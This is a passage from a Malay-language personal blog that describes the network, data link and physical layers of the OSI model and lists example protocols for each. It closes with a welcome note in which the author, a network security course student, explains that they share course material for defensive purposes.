4. Pertukaran Paket Terjujuk (Sequenced Packet Exchange, SPX untukNovell)
5. Protokol Komunikasi Antara Proses VINES (VINES InterprocessCommunication Protocol, VIPC)

Network Layer

Paket yang diterima diproses di lapisan ini yang memberikan alamatlogikal antara klien tanpa menghiraukan bagaimana klien mencapairangkaian. Lapisan ini juga bertanggung jawab untuk memastikan kekukuhankomunikasi, menjaga dan memutuskan sambungan (terminating connections)serta mengarah semua paket atau informasi ke destinasi akhirnya.

Contoh protokol yang digunakan di lapisan ini:
1. Protokol Internet (Internet Protocol, IP)
2. IPX (Protokol Novell)
3. Protokol Pengiriman Datagram (DDP, Apple)
4. Protokol Kawalan Pesanan Internet (Internet Control Message Protocol,ICMP)
5. Protokol Maklumat Laluan (Routing Information Protocol, RIP)
6. ARP
7. RARP
8. OSPF
9. BGP
10.IGMP

Data Link Layer


Lapisan ini boleh dibahagi kepada dua, iaitu Lapisan Capaian Media(Media Access Layer, MAC) dan Kawalan Sambungan Logikal (Logical LinkControl, LLC). Lapisan MAC menguruskan capaian kepada rangkaian seperti Token Passinguntuk topologi Token Ring manakala LCC menerima dan menghantar paket ataupesanan dari lapisan atas, iaitu Lapisan Rangkaian.

Contoh Protocol yang digunakan di lapisan ini ialah:
1. SLIP
2. CSLIP
3. PPP (Point to point protocol)
4. MTU
5. IEEE 802.2 (LLC)
6. IEEE 802.3
7. IEEE 802.5 (token ring)
8. PPP LCP (point to point protocol untuk talian bersiri)

Physical Layer


Semua ciri-ciri fizikal dan isyarat elektrik diproses di sini.Antaramuka seperti RS232 dan V.35 terletak di lapisan fizikal ini. Begitujuga kabel seperti Unshielded Twisted Pair (UTP), Koaxial dan gentianoptik boleh digolongkan di lapisan fizikal manakala peralatan sepertimodem dan multiplex turut berfungsi di lapisan fizikal. Dalam erti katalain, ia adalah lapisan pertama perkakasan.

Contoh lapisan fizikal digunakan ialah:
1. Ethernet (10Base2, 10BaseT, 100BaseT)
2. Token Ring
3. Arcnet
4. FDDI
5. Wireless (contoh FM)



setiap layer-layer tersebut mempunyai fungsi tersendiri dan hacker menggunakan layer-layer tersebut untuk melakukan pencerobohan(hacking).

Welcome to My Blog.....

dalam blog ni terdapat sumber-sumber atau bahan rujukan yang telah saya gunakan sepanjang kursus Network Security Professional di KISMEC dan juga terdapat info tentang selenggaraan komputer. Banyak yang saya dapat tau tentang network komputer sepanjang kursus itu terutama macamana untuk menceroboh(hacking) sesuatu sistem komputer dan sistem rangkaian. Bukan untuk tujuan yang tidak elok tapi untuk kawalan di dalam sesebuah organisasi daripada perkara yang tidak diingini. Sesuatu sistem dapat dikesan kelemahannya dengan membuat pencerobohan seperti SQL injection dan lain2 lagi. Dapat juga kita mengetahui bagaimana seseorang itu menceroboh sesuatu sistem setelah belajar mcmana mereka menceroboh, jadi kita boleh melaksanakan pencegahan dari awal lagi seperti memasang firewall. Untuk mengetahui lebih lanjut, bacalah maklumat yang sy post dlm blog ini, mungkin berguna untuk mengelak dari dicuri password atau maklumat dalam sistem anda.

~Selamat Membaca~